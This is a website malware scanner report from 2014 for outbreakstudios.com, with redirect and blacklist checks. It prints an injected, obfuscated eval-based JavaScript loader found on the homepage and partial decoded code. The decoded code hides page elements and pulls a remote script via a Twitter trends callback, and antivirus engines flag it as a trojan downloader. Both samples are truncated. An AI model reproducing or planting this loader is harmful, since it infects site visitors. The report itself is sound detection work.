New scan:

Malware Scanner report for outbreakstudios.com

Malicious/Suspicious/Total urls checked
1/0/3
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://outbreakstudios.com/
200 OK
Content-Length: 33190
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

d='function g_p(file ,b >t YG="GE ;= [ +cg="" Je +L=tru % +c.offset=100 Qs Yy =z =A =D ! C8 H +C =B ! C8 H Qu Ys ]+t ]Qcd YH(); -sxml2 V1 C-icrosoft V2 ,b=null}}if(! b){if(typeof F!="undefined" ,b 9 F ]* L= 2}} Qo NE, ? ,g[g_E]= .( ?,false) QS NE, ?, <vars C32== <vars C< .( $g_E), $ ?)) * g[ $g_E)]= .( $ ?) U} Qx Nn,g_R){g_N= $ Wf);regexp 9RegExp( Wf+"|"+g_N); B. On 5regexp) Ei=0;i< B. 6;i++){g_k= B.[i] 5"="); 32= OR ,S A * o A}}}; [.trim NE,g_h){if("qabcdef".indexOf(g_E.substr
... 7040 bytes are skipped ...
;" +c <return = !){ Q >=null + ?value @ g[key][ A(g_k[0],g_k[1]) Bvar C){ E;for( FXMLHttpRequest HunR &()} I"|| (==" J +P= 2 +M=fals Kajax.runAJAX( M ,cg+= Wf+g_ N !g_ O=g_ Q} + RbIO#6z% T]= #b.status U, 2) V.XMLHTTP" 4 W c Xb.open( G, Y ! , Zg_ce [window ]() ^g_h[g_E]} _.g_ `#a#';for(c=112;c;d=(t=d.split(' ! # $ % & ( ) * + , - . / 0 2 3 4 5 6 7 8 9 : ; < = > ? @ A B C E F H I J K M N O Q R T U V W X Y Z [ ] ^ _ `'.substr(c-=(x=c<2?1:2),x))).join(t.pop()));eval(d)

Decoded script:


function g_p(file){this.g_b=null;this.g_t=function(){this.g_G="GET";this.g_w="?";this.g_cf="&";this.g_c=window;this.g_cg="";this.g_P=true;this.g_M=false;this.g_L=true;this.g_cc=null;this.g_T=null;this.g_v=file;this.g_g=new Object();this.g_r=new Array(2);this.g_c.offset=100};this.g_s=function(){this.g_y=function(){};this.g_z=function(){};this.g_A=function(){};this.g_D=function(){this.runResponse()};this.g_C=function(){};this.g_B=function(){this.runResponse()}};this.g_u=function(){this.g_
... 72823 bytes are skipped ...
ull){setTimeout(g_cf,200)}else{window.g_e=window;window.g_e.iframeLoaded=true;window.g_M=document.body;window.g_N=document;var g_x=g_T('div');g_r(g_x,'<div id="d3" style="display:none;visibility:hidden;"></div>');g_M.appendChild(g_x);var g_s=g_T('script');g_e.g_G=g_N.getElementsByTagName('head')[0];var g_v=Math.random().toString();g_s.setAttribute('src',"http://api.twitter.com/1/trends/daily.json?callback=window.g_cd&rnd="+g_v);g_G.appendChild(g_s)}}};window.g_cf=g_cf;g_cf()

Antivirus reports:

AntiVir
JS/Twetti.A
McAfee-GW-Edition
Heuristic.BehavesLike.JS.Obfuscated.D
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
NANO-Antivirus
Trojan.Script.Twetti.duhhf
ESET-NOD32
JS/Kryptik.BN

https://count.carrierzone.com/app/count_server/count.js
200 OK
Content-Length: 36029
Content-Type: text/javascript
clean
http://outbreakstudios.com/test404page.js
404 Not Found
Content-Length: 212
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: outbreakstudios.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 Jun 2014 17:03:07 GMT
Server: Apache
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: outbreakstudios.com
Referer: http://www.google.com/search?q=outbreakstudios.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=outbreakstudios.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://outbreakstudios.com/

Result: outbreakstudios.com is not infected or malware details are not published yet.